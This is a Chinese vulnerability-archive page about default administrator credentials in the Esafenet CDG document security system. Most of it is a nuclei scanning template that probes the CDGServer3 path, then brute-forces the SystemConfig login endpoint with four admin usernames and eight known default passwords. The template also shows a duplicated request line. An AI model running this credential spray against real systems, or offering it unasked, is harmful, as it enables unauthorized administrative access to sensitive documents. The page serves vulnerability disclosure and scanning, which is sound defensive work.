Esafenet CDG 默认登录凭证漏洞

漏洞信息

漏洞名称: Esafenet CDG 默认登录凭证漏洞

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: Esafenet CDG是一款电子文档安全管理系统,广泛应用于企业级文档安全管理,提供文档加密、权限控制等功能。该系统被发现存在默认登录凭证漏洞,攻击者可以利用这些默认凭证未经授权访问系统。该漏洞的根源在于系统安装后未强制修改默认的管理员账户和密码,导致攻击者可以轻易猜测或使用已知的默认凭证组合进行登录。这种漏洞的存在使得攻击者能够获取系统管理权限,进而可能执行任意操作,如查看、修改或删除敏感文档,甚至植入恶意代码。由于该漏洞不需要任何前置条件即可利用,且攻击过程可以自动化,因此对使用该系统的组织构成了严重的安全威胁。

产品厂商: esafenet

产品名称: cdg

影响版本: *

搜索语法: esafenet

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fesafenet-cdg-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

id: esafenet-cdg-default-login

info:
  name: Esafenet CDG - Default Login
  author: chesterblue
  severity: high
  description: |
    Esafenet electronic document security management system default  credentials were discovered.
  classification:
    cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 33
    vendor: esafenet
    product: cdg
    fofa-query: esafenet
  tags: esafenet,cdg,default-login

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/CDGServer3/"

    matchers:
      - type: word
        words:
          - "CDGServer"
          - "Esafenet"
        condition: or
        internal: true

  - method: POST
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/SystemConfig"

    headers:
      content-type: application/x-www-form-urlencoded

    body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
    attack: clusterbomb
    payloads:
      username:
        - "systemadmin"
        - "configadmin"
        - "secadmin"
        - "docadmin"
      password:
        - "Est@Spc820"
        - "12345678"
        - "123456"
        - "Est@Spc2018"
        - "Est@Spc2019"
        - "Est@Spc2020"
        - "Est@Spc2021"
        - "Est@Spc2022"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "est.connection.url"

      - type: regex
        part: body
        regex:
          - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210085e9f3b18bc5b7b44e028a20c0745ee61d7a63c9563e593e6a898ee100ffe9ba02201fa634ce63e9425db0f5fd96d880a129aa85a75a011f5a64e5e16f08bd1c1fa0:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #弱口令
Esafenet CDG 默认登录凭证漏洞
http://example.com/2025/07/21/github_3292569283/
作者
lianccc
发布于
2025年7月21日
许可协议